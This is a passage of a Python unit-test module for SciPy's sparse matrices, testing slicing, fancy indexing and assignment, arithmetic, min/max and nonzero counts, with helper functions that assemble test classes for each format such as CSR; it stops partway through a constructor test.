@dec.skipif(NumpyVersion(np.__version__) >= '1.9.0.dev')
def test_multiple_ellipsis_slicing(self):
b = asmatrix(arange(50).reshape(5,10))
a = self.spmatrix(b)
assert_array_equal(a[..., ...].A, b[..., ...].A)
assert_array_equal(a[..., ..., ...].A, b[..., ..., ...].A)
assert_array_equal(a[1, ..., ...].A, b[1, ..., ...].A)
assert_array_equal(a[1:, ..., ...].A, b[1:, ..., ...].A)
assert_array_equal(a[..., ..., 1:].A, b[..., ..., 1:].A)
# Bug in NumPy's slicing
assert_array_equal(a[..., ..., 1].A, b[..., ..., 1].A.reshape((5,1)))
class _TestSlicingAssign:
def test_slice_scalar_assign(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((5, 5))
B = np.zeros((5, 5))
for C in [A, B]:
C[0:1,1] = 1
C[3:0,0] = 4
C[3:4,0] = 9
C[0,4:] = 1
C[3::-1,4:] = 9
assert_array_equal(A.toarray(), B)
def test_slice_assign_2(self):
n, m = (5, 10)
def _test_set(i, j):
msg = "i=%r; j=%r" % (i, j)
A = self.spmatrix((n, m))
A[i, j] = 1
B = np.zeros((n, m))
B[i, j] = 1
assert_array_almost_equal(A.todense(), B, err_msg=msg)
# [i,1:2]
for i, j in [(2, slice(3)), (2, slice(None, 10, 4)), (2, slice(5, -2)),
(array(2), slice(5, -2))]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
_test_set(i, j)
def test_self_self_assignment(self):
# Tests whether a row of one lil_matrix can be assigned to
# another.
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
B = self.spmatrix((4,3))
B[0,0] = 2
B[1,2] = 7
B[2,1] = 3
B[3,0] = 10
A = B / 10
B[0,:] = A[0,:]
assert_array_equal(A[0,:].A, B[0,:].A)
A = B / 10
B[:,:] = A[:1,:1]
assert_equal(A[0,0], B[3,2])
A = B / 10
B[:-1,0] = A[0,:].T
assert_array_equal(A[0,:].A.T, B[:-1,0].A)
def test_slice_assignment(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
B = self.spmatrix((4,3))
B[0,0] = 5
B[1,2] = 3
B[2,1] = 7
expected = array([[10,0,0],
[0,0,6],
[0,14,0],
[0,0,0]])
B[:,:] = B+B
assert_array_equal(B.todense(),expected)
block = [[1,0],[0,4]]
B[:2,:2] = csc_matrix(array(block))
assert_array_equal(B.todense()[:2,:2],block)
def test_set_slice(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((5,10))
B = matrix(zeros((5,10), float))
s_ = np.s_
slices = [s_[:2], s_[1:2], s_[3:], s_[3::2],
s_[8:3:-1], s_[4::-2], s_[:5:-1],
0, 1, s_[:], s_[1:5], -1, -2, -5,
array(-1), np.int8(-3)]
for j, a in enumerate(slices):
A[a] = j
B[a] = j
assert_array_equal(A.todense(), B, repr(a))
for i, a in enumerate(slices):
for j, b in enumerate(slices):
A[a,b] = 10*i + 1000*(j+1)
B[a,b] = 10*i + 1000*(j+1)
assert_array_equal(A.todense(), B, repr((a, b)))
A[0, 1:10:2] = xrange(1,10,2)
B[0, 1:10:2] = xrange(1,10,2)
assert_array_equal(A.todense(), B)
A[1:5:2,0] = np.array(range(1,5,2))[:,None]
B[1:5:2,0] = np.array(range(1,5,2))[:,None]
assert_array_equal(A.todense(), B)
# The next commands should raise exceptions
assert_raises(ValueError, A.__setitem__, (0, 0), list(range(100)))
assert_raises(ValueError, A.__setitem__, (0, 0), arange(100))
assert_raises(ValueError, A.__setitem__, (0, slice(None)),
list(range(100)))
assert_raises(ValueError, A.__setitem__, (slice(None), 1),
list(range(100)))
assert_raises(ValueError, A.__setitem__, (slice(None), 1), A.copy())
assert_raises(ValueError, A.__setitem__,
([[1, 2, 3], [0, 3, 4]], [1, 2, 3]), [1, 2, 3, 4])
assert_raises(ValueError, A.__setitem__,
([[1, 2, 3], [0, 3, 4], [4, 1, 3]],
[[1, 2, 4], [0, 1, 3]]), [2, 3, 4])
class _TestFancyIndexing:
"""Tests fancy indexing features. The tests for any matrix formats
that implement these features should derive from this class.
"""
def test_bad_index(self):
A = self.spmatrix(np.zeros([5, 5]))
assert_raises((IndexError, ValueError, TypeError), A.__getitem__, "foo")
assert_raises((IndexError, ValueError, TypeError), A.__getitem__, (2, "foo"))
assert_raises((IndexError, ValueError), A.__getitem__,
([1, 2, 3], [1, 2, 3, 4]))
def test_fancy_indexing(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
# [i]
assert_equal(A[[1,3]].todense(), B[[1,3]])
# [i,[1,2]]
assert_equal(A[3,[1,3]].todense(), B[3,[1,3]])
assert_equal(A[-1,[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[-1,array([2,-5])].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),array([2,-5])].todense(),B[-1,[2,-5]])
# [1:2,[1,2]]
assert_equal(A[:,[2,8,3,-1]].todense(),B[:,[2,8,3,-1]])
assert_equal(A[3:4,[9]].todense(), B[3:4,[9]])
assert_equal(A[1:4,[-1,-5]].todense(), B[1:4,[-1,-5]])
assert_equal(A[1:4,array([-1,-5])].todense(), B[1:4,[-1,-5]])
# [[1,2],j]
assert_equal(A[[1,3],3].todense(), B[[1,3],3])
assert_equal(A[[2,-5],-4].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),-4].todense(), B[[2,-5],-4])
assert_equal(A[[2,-5],array(-4)].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),array(-4)].todense(), B[[2,-5],-4])
# [[1,2],1:2]
assert_equal(A[[1,3],:].todense(), B[[1,3],:])
assert_equal(A[[2,-5],8:-1].todense(),B[[2,-5],8:-1])
assert_equal(A[array([2,-5]),8:-1].todense(),B[[2,-5],8:-1])
# [[1,2],[1,2]]
assert_equal(todense(A[[1,3],[2,4]]), B[[1,3],[2,4]])
assert_equal(todense(A[[-1,-3],[2,-4]]), B[[-1,-3],[2,-4]])
assert_equal(todense(A[array([-1,-3]),[2,-4]]), B[[-1,-3],[2,-4]])
assert_equal(todense(A[[-1,-3],array([2,-4])]), B[[-1,-3],[2,-4]])
assert_equal(todense(A[array([-1,-3]),array([2,-4])]), B[[-1,-3],[2,-4]])
# [[[1],[2]],[1,2]]
assert_equal(A[[[1],[3]],[2,4]].todense(), B[[[1],[3]],[2,4]])
assert_equal(A[[[-1],[-3],[-2]],[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[[[-1],[-3],[-2]],array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
# [[1,2]]
assert_equal(A[[1,3]].todense(), B[[1,3]])
assert_equal(A[[-1,-3]].todense(),B[[-1,-3]])
assert_equal(A[array([-1,-3])].todense(),B[[-1,-3]])
# [[1,2],:][:,[1,2]]
assert_equal(A[[1,3],:][:,[2,4]].todense(), B[[1,3],:][:,[2,4]])
assert_equal(A[[-1,-3],:][:,[2,-4]].todense(), B[[-1,-3],:][:,[2,-4]])
assert_equal(A[array([-1,-3]),:][:,array([2,-4])].todense(), B[[-1,-3],:][:,[2,-4]])
# [:,[1,2]][[1,2],:]
assert_equal(A[:,[1,3]][[2,4],:].todense(), B[:,[1,3]][[2,4],:])
assert_equal(A[:,[-1,-3]][[2,-4],:].todense(), B[:,[-1,-3]][[2,-4],:])
assert_equal(A[:,array([-1,-3])][array([2,-4]),:].todense(), B[:,[-1,-3]][[2,-4],:])
# Check bug reported by Robert Cimrman:
# http://thread.gmane.org/gmane.comp.python.scientific.devel/7986
s = slice(int8(2),int8(4),None)
assert_equal(A[s,:].todense(), B[2:4,:])
assert_equal(A[:,s].todense(), B[:,2:4])
def test_fancy_indexing_randomized(self):
np.random.seed(1234) # make runs repeatable
NUM_SAMPLES = 50
M = 6
N = 4
D = np.asmatrix(np.random.rand(M,N))
D = np.multiply(D, D > 0.5)
I = np.random.random_integers(-M + 1, M - 1, size=NUM_SAMPLES)
J = np.random.random_integers(-N + 1, N - 1, size=NUM_SAMPLES)
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
I_bad = I + M
J_bad = J - N
assert_raises(IndexError, S.__getitem__, (I_bad,J))
assert_raises(IndexError, S.__getitem__, (I,J_bad))
def test_fancy_indexing_boolean(self):
np.random.seed(1234) # make runs repeatable
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
I = np.array(np.random.randint(0, 2, size=5), dtype=bool)
J = np.array(np.random.randint(0, 2, size=10), dtype=bool)
X = np.array(np.random.randint(0, 2, size=(5, 10)), dtype=bool)
assert_equal(todense(A[I]), B[I])
assert_equal(todense(A[:,J]), B[:, J])
assert_equal(todense(A[X]), B[X])
assert_equal(todense(A[B > 9]), B[B > 9])
I = np.array([True, False, True, True, False])
J = np.array([False, True, True, False, True])
assert_equal(todense(A[I, J]), B[I, J])
Z1 = np.zeros((6, 11), dtype=bool)
Z2 = np.zeros((6, 11), dtype=bool)
Z2[0,-1] = True
Z3 = np.zeros((6, 11), dtype=bool)
Z3[-1,0] = True
assert_equal(A[Z1], np.array([]))
assert_raises(IndexError, A.__getitem__, Z2)
assert_raises(IndexError, A.__getitem__, Z3)
assert_raises((IndexError, ValueError), A.__getitem__, (X, 1))
def test_fancy_indexing_sparse_boolean(self):
np.random.seed(1234) # make runs repeatable
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
X = np.array(np.random.randint(0, 2, size=(5, 10)), dtype=bool)
Xsp = csr_matrix(X)
assert_equal(todense(A[Xsp]), B[X])
assert_equal(todense(A[A > 9]), B[B > 9])
Z = np.array(np.random.randint(0, 2, size=(5, 11)), dtype=bool)
Y = np.array(np.random.randint(0, 2, size=(6, 10)), dtype=bool)
Zsp = csr_matrix(Z)
Ysp = csr_matrix(Y)
assert_raises(IndexError, A.__getitem__, Zsp)
assert_raises(IndexError, A.__getitem__, Ysp)
assert_raises((IndexError, ValueError), A.__getitem__, (Xsp, 1))
def test_fancy_indexing_regression_3087(self):
mat = self.spmatrix(array([[1, 0, 0], [0,1,0], [1,0,0]]))
desired_cols = np.ravel(mat.sum(0)) > 0
assert_equal(mat[:, desired_cols].A, [[1, 0], [0, 1], [1, 0]])
def test_fancy_indexing_seq_assign(self):
mat = self.spmatrix(array([[1, 0], [0, 1]]))
assert_raises(ValueError, mat.__setitem__, (0, 0), np.array([1,2]))
def test_fancy_indexing_empty(self):
B = asmatrix(arange(50).reshape(5,10))
B[1,:] = 0
B[:,2] = 0
B[3,6] = 0
A = self.spmatrix(B)
K = np.array([False, False, False, False, False])
assert_equal(todense(A[K]), B[K])
K = np.array([], dtype=int)
assert_equal(todense(A[K]), B[K])
assert_equal(todense(A[K,K]), B[K,K])
J = np.array([0, 1, 2, 3, 4], dtype=int)[:,None]
assert_equal(todense(A[K,J]), B[K,J])
assert_equal(todense(A[J,K]), B[J,K])
@contextlib.contextmanager
def check_remains_sorted(X):
"""Checks that sorted indices property is retained through an operation
"""
if not hasattr(X, 'has_sorted_indices') or not X.has_sorted_indices:
yield
return
yield
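# After the wrapped operation, force a re-sort; it must leave the index
# arrays unchanged if sorted order was really preserved.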
indices = X.indices.copy()
X.has_sorted_indices = False
X.sort_indices()
assert_array_equal(indices, X.indices,
'Expected sorted indices, found unsorted')
class _TestFancyIndexingAssign:
def test_bad_index_assign(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix(np.zeros([5, 5]))
assert_raises((IndexError, ValueError, TypeError), A.__setitem__, "foo", 2)
assert_raises((IndexError, ValueError, TypeError), A.__setitem__, (2, "foo"), 5)
def test_fancy_indexing_set(self):
n, m = (5, 10)
def _test_set_slice(i, j):
A = self.spmatrix((n, m))
with check_remains_sorted(A):
A[i, j] = 1
B = asmatrix(np.zeros((n, m)))
B[i, j] = 1
assert_array_almost_equal(A.todense(), B)
# [1:2,1:2]
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
for i, j in [((2, 3, 4), slice(None, 10, 4)),
(np.arange(3), slice(5, -2)),
(slice(2, 5), slice(5, -2))]:
_test_set_slice(i, j)
for i, j in [(np.arange(3), np.arange(3)), ((0, 3, 4), (1, 2, 4))]:
_test_set_slice(i, j)
def test_fancy_assignment_dtypes(self):
def check(dtype):
A = self.spmatrix((5, 5), dtype=dtype)
A[[0,1],[0,1]] = dtype.type(1)
assert_equal(A.sum(), dtype.type(1)*2)
A[0:2,0:2] = dtype.type(1.0)
assert_equal(A.sum(), dtype.type(1)*4)
A[2,2] = dtype.type(1.0)
assert_equal(A.sum(), dtype.type(1)*4 + dtype.type(1))
for dtype in supported_dtypes:
yield check, np.dtype(dtype)
def test_sequence_assignment(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((4,3))
B = self.spmatrix(eye(3,4))
i0 = [0,1,2]
i1 = (0,1,2)
i2 = array(i0)
with check_remains_sorted(A):
A[0,i0] = B[i0,0].T
A[1,i1] = B[i1,1].T
A[2,i2] = B[i2,2].T
assert_array_equal(A.todense(),B.T.todense())
# column slice
A = self.spmatrix((2,3))
with check_remains_sorted(A):
A[1,1:3] = [10,20]
assert_array_equal(A.todense(), [[0,0,0],[0,10,20]])
# row slice
A = self.spmatrix((3,2))
with check_remains_sorted(A):
A[1:3,1] = [[10],[20]]
assert_array_equal(A.todense(), [[0,0],[0,10],[0,20]])
# both slices
A = self.spmatrix((3,3))
B = asmatrix(np.zeros((3,3)))
with check_remains_sorted(A):
for C in [A, B]:
C[[0,1,2], [0,1,2]] = [4,5,6]
assert_array_equal(A.toarray(), B)
# both slices (2)
A = self.spmatrix((4, 3))
with check_remains_sorted(A):
A[(1, 2, 3), (0, 1, 2)] = [1, 2, 3]
assert_almost_equal(A.sum(), 6)
B = asmatrix(np.zeros((4, 3)))
B[(1, 2, 3), (0, 1, 2)] = [1, 2, 3]
assert_array_equal(A.todense(), B)
def test_fancy_assign_empty(self):
B = asmatrix(arange(50).reshape(5,10))
B[1,:] = 0
B[:,2] = 0
B[3,6] = 0
A = self.spmatrix(B)
K = np.array([False, False, False, False, False])
A[K] = 42
assert_equal(todense(A), B)
K = np.array([], dtype=int)
A[K] = 42
assert_equal(todense(A), B)
A[K,K] = 42
assert_equal(todense(A), B)
J = np.array([0, 1, 2, 3, 4], dtype=int)[:,None]
A[K,J] = 42
assert_equal(todense(A), B)
A[J,K] = 42
assert_equal(todense(A), B)
class _TestFancyMultidim:
def test_fancy_indexing_ndarray(self):
sets = [
(np.array([[1], [2], [3]]), np.array([3, 4, 2])),
(np.array([[1], [2], [3]]), np.array([[3, 4, 2]])),
(np.array([[1, 2, 3]]), np.array([[3], [4], [2]])),
(np.array([1, 2, 3]), np.array([[3], [4], [2]])),
(np.array([[1, 2, 3], [3, 4, 2]]),
np.array([[5, 6, 3], [2, 3, 1]]))
]
# These inputs generate 3-D outputs
# (np.array([[[1], [2], [3]], [[3], [4], [2]]]),
# np.array([[[5], [6], [3]], [[2], [3], [1]]])),
for I, J in sets:
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
I_bad = I + 5
J_bad = J + 7
assert_raises(IndexError, S.__getitem__, (I_bad,J))
assert_raises(IndexError, S.__getitem__, (I,J_bad))
# This would generate 3-D arrays -- not supported
assert_raises(IndexError, S.__getitem__, ([I, I], slice(None)))
assert_raises(IndexError, S.__getitem__, (slice(None), [J, J]))
class _TestFancyMultidimAssign:
def test_fancy_assign_ndarray(self):
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
X = np.random.rand(2, 3)
I = np.array([[1, 2, 3], [3, 4, 2]])
J = np.array([[5, 6, 3], [2, 3, 1]])
with check_remains_sorted(S):
S[I,J] = X
D[I,J] = X
assert_equal(S.todense(), D)
I_bad = I + 5
J_bad = J + 7
C = [1, 2, 3]
with check_remains_sorted(S):
S[I,J] = C
D[I,J] = C
assert_equal(S.todense(), D)
with check_remains_sorted(S):
S[I,J] = 3
D[I,J] = 3
assert_equal(S.todense(), D)
assert_raises(IndexError, S.__setitem__, (I_bad,J), C)
assert_raises(IndexError, S.__setitem__, (I,J_bad), C)
def test_fancy_indexing_multidim_set(self):
n, m = (5, 10)
def _test_set_slice(i, j):
A = self.spmatrix((n, m))
with check_remains_sorted(A):
A[i, j] = 1
B = asmatrix(np.zeros((n, m)))
B[i, j] = 1
assert_array_almost_equal(A.todense(), B)
# [[[1, 2], [1, 2]], [1, 2]]
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
for i, j in [(np.array([[1, 2], [1, 3]]), [1, 3]),
(np.array([0, 4]), [[0, 3], [1, 2]]),
([[1, 2, 3], [0, 2, 4]], [[0, 4, 3], [4, 1, 2]])]:
_test_set_slice(i, j)
def test_fancy_assign_list(self):
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
X = np.random.rand(2, 3)
I = [[1, 2, 3], [3, 4, 2]]
J = [[5, 6, 3], [2, 3, 1]]
S[I,J] = X
D[I,J] = X
assert_equal(S.todense(), D)
I_bad = [[ii + 5 for ii in i] for i in I]
J_bad = [[jj + 7 for jj in j] for j in J]
C = [1, 2, 3]
S[I,J] = C
D[I,J] = C
assert_equal(S.todense(), D)
S[I,J] = 3
D[I,J] = 3
assert_equal(S.todense(), D)
assert_raises(IndexError, S.__setitem__, (I_bad,J), C)
assert_raises(IndexError, S.__setitem__, (I,J_bad), C)
def test_fancy_assign_slice(self):
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
I = [[1, 2, 3], [3, 4, 2]]
J = [[5, 6, 3], [2, 3, 1]]
I_bad = [[ii + 5 for ii in i] for i in I]
J_bad = [[jj + 7 for jj in j] for j in J]
C = [1, 2, 3, 4, 5, 6, 7]
assert_raises(IndexError, S.__setitem__, (I_bad, slice(None)), C)
assert_raises(IndexError, S.__setitem__, (slice(None), J_bad), C)
class _TestArithmetic:
"""
Test real/complex arithmetic
"""
def __arith_init(self):
# these can be represented exactly in FP (so arithmetic should be exact)
self.__A = matrix([[-1.5, 6.5, 0, 2.25, 0, 0],
[3.125, -7.875, 0.625, 0, 0, 0],
[0, 0, -0.125, 1.0, 0, 0],
[0, 0, 8.375, 0, 0, 0]],'float64')
self.__B = matrix([[0.375, 0, 0, 0, -5, 2.5],
[14.25, -3.75, 0, 0, -0.125, 0],
[0, 7.25, 0, 0, 0, 0],
[18.5, -0.0625, 0, 0, 0, 0]],'complex128')
self.__B.imag = matrix([[1.25, 0, 0, 0, 6, -3.875],
[2.25, 4.125, 0, 0, 0, 2.75],
[0, 4.125, 0, 0, 0, 0],
[-0.0625, 0, 0, 0, 0, 0]],'float64')
# fractions are all x/16ths
assert_array_equal((self.__A*16).astype('int32'),16*self.__A)
assert_array_equal((self.__B.real*16).astype('int32'),16*self.__B.real)
assert_array_equal((self.__B.imag*16).astype('int32'),16*self.__B.imag)
self.__Asp = self.spmatrix(self.__A)
self.__Bsp = self.spmatrix(self.__B)
def test_add_sub(self):
self.__arith_init()
# basic tests
assert_array_equal((self.__Asp+self.__Bsp).todense(),self.__A+self.__B)
# check conversions
for x in supported_dtypes:
A = self.__A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
if not np.issubdtype(y, np.complexfloating):
B = self.__B.real.astype(y)
else:
B = self.__B.astype(y)
Bsp = self.spmatrix(B)
# addition
D1 = A + B
S1 = Asp + Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp + B,D1) # check sparse + dense
assert_array_equal(A + Bsp,D1) # check dense + sparse
# subtraction
if (np.dtype('bool') in [x, y]) and (
NumpyVersion(np.__version__) >= '1.9.0.dev'):
# boolean array subtraction deprecated in 1.9.0
continue
D1 = A - B
S1 = Asp - Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp - B,D1) # check sparse - dense
assert_array_equal(A - Bsp,D1) # check dense - sparse
def test_mu(self):
self.__arith_init()
# basic tests
assert_array_equal((self.__Asp*self.__Bsp.T).todense(),self.__A*self.__B.T)
for x in supported_dtypes:
A = self.__A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
if np.issubdtype(y, np.complexfloating):
B = self.__B.astype(y)
else:
B = self.__B.real.astype(y)
Bsp = self.spmatrix(B)
D1 = A * B.T
S1 = Asp * Bsp.T
assert_allclose(S1.todense(), D1,
atol=1e-14*abs(D1).max())
assert_equal(S1.dtype,D1.dtype)
class _TestMinMax(object):
def test_minmax(self):
for dtype in [np.float32, np.float64, np.int32, np.int64, np.complex128]:
D = np.arange(20, dtype=dtype).reshape(5,4)
X = self.spmatrix(D)
assert_equal(X.min(), 0)
assert_equal(X.max(), 19)
assert_equal(X.min().dtype, dtype)
assert_equal(X.max().dtype, dtype)
D *= -1
X = self.spmatrix(D)
assert_equal(X.min(), -19)
assert_equal(X.max(), 0)
D += 5
X = self.spmatrix(D)
assert_equal(X.min(), -14)
assert_equal(X.max(), 5)
# try a fully dense matrix
X = self.spmatrix(np.arange(1, 10).reshape(3, 3))
assert_equal(X.min(), 1)
assert_equal(X.min().dtype, X.dtype)
X = -X
assert_equal(X.max(), -1)
# and a fully sparse matrix
Z = self.spmatrix(np.zeros(1))
assert_equal(Z.min(), 0)
assert_equal(Z.max(), 0)
assert_equal(Z.max().dtype, Z.dtype)
# another test
D = np.arange(20, dtype=float).reshape(5,4)
D[0:2, :] = 0
X = self.spmatrix(D)
assert_equal(X.min(), 0)
assert_equal(X.max(), 19)
# zero-size matrices
for D in [np.zeros((0, 0)), np.zeros((0, 10)), np.zeros((10, 0))]:
X = self.spmatrix(D)
assert_raises(ValueError, X.min)
assert_raises(ValueError, X.max)
def test_minmax_axis(self):
D = np.matrix(np.arange(50).reshape(5,10))
# completely empty rows, leaving some completely full:
D[1, :] = 0
# empty at end for reduceat:
D[:, 9] = 0
# partial rows/cols:
D[3, 3] = 0
# entries on either side of 0:
D[2, 2] = -1
X = self.spmatrix(D)
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.max/min with negative axis arg doesn't work for < 1.7
axes = [-2, -1, 0, 1]
else:
axes = [0, 1]
for axis in axes:
assert_array_equal(X.max(axis=axis).A, D.max(axis=axis).A)
assert_array_equal(X.min(axis=axis).A, D.min(axis=axis).A)
# full matrix
D = np.matrix(np.arange(1, 51).reshape(10, 5))
X = self.spmatrix(D)
for axis in axes:
assert_array_equal(X.max(axis=axis).A, D.max(axis=axis).A)
assert_array_equal(X.min(axis=axis).A, D.min(axis=axis).A)
# empty matrix
D = np.matrix(np.zeros((10, 5)))
X = self.spmatrix(D)
for axis in axes:
assert_array_equal(X.max(axis=axis).A, D.max(axis=axis).A)
assert_array_equal(X.min(axis=axis).A, D.min(axis=axis).A)
if NumpyVersion(np.__version__) >= '1.7.0':
axes_even = [0, -2]
axes_odd = [1, -1]
else:
axes_even = [0]
axes_odd = [1]
# zero-size matrices
D = np.zeros((0, 10))
X = self.spmatrix(D)
for axis in axes_even:
assert_raises(ValueError, X.min, axis=axis)
assert_raises(ValueError, X.max, axis=axis)
for axis in axes_odd:
assert_array_equal(np.zeros((0, 1)), X.min(axis=axis).A)
assert_array_equal(np.zeros((0, 1)), X.max(axis=axis).A)
D = np.zeros((10, 0))
X = self.spmatrix(D)
for axis in axes_odd:
assert_raises(ValueError, X.min, axis=axis)
assert_raises(ValueError, X.max, axis=axis)
for axis in axes_even:
assert_array_equal(np.zeros((1, 0)), X.min(axis=axis).A)
assert_array_equal(np.zeros((1, 0)), X.max(axis=axis).A)
class _TestGetNnzAxis(object):
def test_getnnz_axis(self):
dat = np.matrix([[0, 2],
[3, 5],
[-6, 9]])
bool_dat = dat.astype(bool).A
datsp = self.spmatrix(dat)
assert_array_equal(bool_dat.sum(axis=None), datsp.getnnz(axis=None))
assert_array_equal(bool_dat.sum(), datsp.getnnz())
assert_array_equal(bool_dat.sum(axis=0), datsp.getnnz(axis=0))
assert_array_equal(bool_dat.sum(axis=1), datsp.getnnz(axis=1))
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.sum with negative axis arg doesn't work for < 1.7
assert_array_equal(bool_dat.sum(axis=-2), datsp.getnnz(axis=-2))
assert_array_equal(bool_dat.sum(axis=-1), datsp.getnnz(axis=-1))
assert_raises(ValueError, datsp.getnnz, axis=2)
#------------------------------------------------------------------------------
# Tailored base class for generic tests
#------------------------------------------------------------------------------
def _possibly_unimplemented(cls, require=True):
"""
    Construct a class that either runs tests as usual (require=True), or
    wraps each test method so that a common "not implemented" error is
    reported as a SkipTest instead of a failure (require=False).
"""
if require:
return cls
else:
def wrap(fc):
def wrapper(*a, **kw):
try:
return fc(*a, **kw)
except (NotImplementedError, TypeError, ValueError,
IndexError, AttributeError):
raise nose.SkipTest("feature not implemented")
wrapper.__name__ = fc.__name__
return wrapper
new_dict = dict(cls.__dict__)
for name, func in cls.__dict__.items():
if name.startswith('test_'):
new_dict[name] = wrap(func)
return type(cls.__name__ + "NotImplemented",
cls.__bases__,
new_dict)
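# Illustrative sketch (not part of the original suite): with require=False the
# class returned by _possibly_unimplemented behaves like the input class,
# except that any test_* method hitting one of the "common" errors above is
# reported as a skip rather than a failure. The names below are hypothetical.
def _example_possibly_unimplemented_usage():
    class _FakeTests(object):
        def test_feature(self):
            raise NotImplementedError("hypothetical unimplemented feature")
    wrapped_cls = _possibly_unimplemented(_FakeTests, require=False)
    # wrapped_cls().test_feature() would raise nose.SkipTest instead of
    # propagating the NotImplementedError.
    return wrapped_cls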
def sparse_test_class(getset=True, slicing=True, slicing_assign=True,
fancy_indexing=True, fancy_assign=True,
fancy_multidim_indexing=True, fancy_multidim_assign=True,
minmax=True, nnz_axis=True):
"""
    Construct a base class for format-specific tests, optionally wrapping
    some of the tests in the suite so that they are skipped when the
    corresponding feature is not implemented.
"""
bases = (_TestCommon,
_possibly_unimplemented(_TestGetSet, getset),
_TestSolve,
_TestInplaceArithmetic,
_TestArithmetic,
_possibly_unimplemented(_TestSlicing, slicing),
_possibly_unimplemented(_TestSlicingAssign, slicing_assign),
_possibly_unimplemented(_TestFancyIndexing, fancy_indexing),
_possibly_unimplemented(_TestFancyIndexingAssign,
fancy_assign),
_possibly_unimplemented(_TestFancyMultidim,
fancy_indexing and fancy_multidim_indexing),
_possibly_unimplemented(_TestFancyMultidimAssign,
fancy_multidim_assign and fancy_assign),
_possibly_unimplemented(_TestMinMax, minmax),
_possibly_unimplemented(_TestGetNnzAxis, nnz_axis))
# check that test names do not clash
names = {}
for cls in bases:
for name in cls.__dict__:
if not name.startswith('test_'):
continue
old_cls = names.get(name)
if old_cls is not None:
raise ValueError("Test class %s overloads test %s defined in %s" % (
cls.__name__, name, old_cls.__name__))
names[name] = cls
return type("TestBase", bases, {})
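# Illustrative sketch (not part of the original suite): a hypothetical matrix
# format would derive its test class from the generated base and switch off
# the features it does not support, exactly as TestDOK and TestCOO do below.
# csr_matrix is used here only as a stand-in spmatrix.
def _example_sparse_test_class_usage():
    base = sparse_test_class(fancy_indexing=False, fancy_assign=False,
                             minmax=False)
    class _HypotheticalFormatTests(base):
        spmatrix = csr_matrix
        checked_dtypes = [np.float_]
    return _HypotheticalFormatTests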
#------------------------------------------------------------------------------
# Matrix class based tests
#------------------------------------------------------------------------------
class TestCSR(sparse_test_class()):
spmatrix = csr_matrix
checked_dtypes = [np.bool_, np.int_, np.float_, np.complex_]
def test_constructor1(self):
b = matrix([[0,4,0],
[3,0,0],
[0,2,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[4,3,2])
assert_array_equal(bsp.indices,[1,0,1])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_equal(bsp.getnnz(),3)
assert_equal(bsp.getformat(),'csr')
assert_array_equal(bsp.todense(),b)
def test_constructor2(self):
b = zeros((6,6),'d')
b[3,4] = 5
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[4])
assert_array_equal(bsp.indptr,[0,0,0,0,1,1,1])
assert_array_almost_equal(bsp.todense(),b)
def test_constructor3(self):
b = matrix([[1,0],
[0,2],
[3,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,3])
assert_array_equal(bsp.indices,[0,1,0])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_array_almost_equal(bsp.todense(),b)
### currently disabled
## def test_constructor4(self):
## """try using int64 indices"""
## data = arange( 6 ) + 1
## col = array( [1, 2, 1, 0, 0, 2], dtype='int64' )
## ptr = array( [0, 2, 4, 6], dtype='int64' )
##
## a = csr_matrix( (data, col, ptr), shape = (3,3) )
##
## b = matrix([[0,1,2],
## [4,3,0],
## [5,0,6]],'d')
##
## assert_equal(a.indptr.dtype,numpy.dtype('int64'))
## assert_equal(a.indices.dtype,numpy.dtype('int64'))
## assert_array_equal(a.todense(),b)
def test_constructor4(self):
# using (data, ij) format
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
